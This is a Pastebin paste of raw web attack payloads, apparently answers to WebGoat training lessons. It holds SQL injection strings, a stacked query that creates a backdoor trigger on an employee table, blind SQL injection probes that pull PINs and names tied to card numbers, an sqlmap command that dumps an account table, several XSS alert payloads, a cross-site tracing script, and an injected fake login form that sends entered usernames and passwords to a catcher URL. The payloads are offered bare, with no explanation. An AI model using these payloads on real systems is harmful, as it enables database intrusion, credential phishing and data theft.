API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Apr 2nd, 2017
510
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.17 KB | None | 0 0
raw download clone embed print report
  1. Smith' OR 1 = 1 or last_name = 'bla
  2.  
  3. smith' OR '1' = '1
  4.  
  5. String query = "SELECT * FROM employee WHERE userid = ? and password = ?";
  6. try
  7. {
  8. Connection connection = WebSession.getConnections(s);
  9. PreparedStatement statement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
  10. statement.setString(1, userId);
  11. statement.setString(2, password);
  12. ResultSet answer_results = statement.executeQuery();
  13.  
  14.  
  15. 101; CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='john@hackme.com' WHERE userid = NEW.userid
  16.  
  17. 101 and ((SELECT pin from pins where cc_number='1111222233334444') > 1000);
  18.  
  19. 101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 2, 1) < 'K' );
  20. 101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 2, 1) < 'j' );
  21. 101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 2, 1) < 'm' );
  22. 101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 2, 1) < 'm' );
  23.  
  24. Oftewel Jill
  25.  
  26. sqlmap -u "http://192.168.56.1:8080/search.php?what=1&search=search" --dump -D bookshop -T account
  27.  
  28.  
  29. </form><script>function hack(){ XSSImage=new Image; XSSImage.src="http://localhost/WebGoat/catcher?PROPERTY=yes&user="+ document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("Get rekt skrub");} </script><form name="phish"><br><br><HR><H3>This feature requires account login:</H3 ><br><br>Enter Username:<br><input type="text" name="user"><br>Enter Password:<br><input type="password" name = "pass"><br><input type="submit" name="login" value="login" onclick="hack()"></form><br><br><HR>
  30.  
  31. <script>alert("rekt");</script>
  32.  
  33.  
  34. <script>alert("Dangerous");</script>
  35.  
  36. <script language="javascript" type="text/javascript">alert("Ha Ha Ha");</script>
  37.  
  38. <script>alert('Bang!')</script>
  39.  
  40. <script type="text/javascript">if ( navigator.appName.indexOf("Microsoft") !=-1) {var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("TRACE", "./", false); xmlHttp.send();str1=xmlHttp.responseText; while (str1.indexOf("\n") > -1) str1 = str1.replace("\n","<br>"); document.write(str1);}</script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!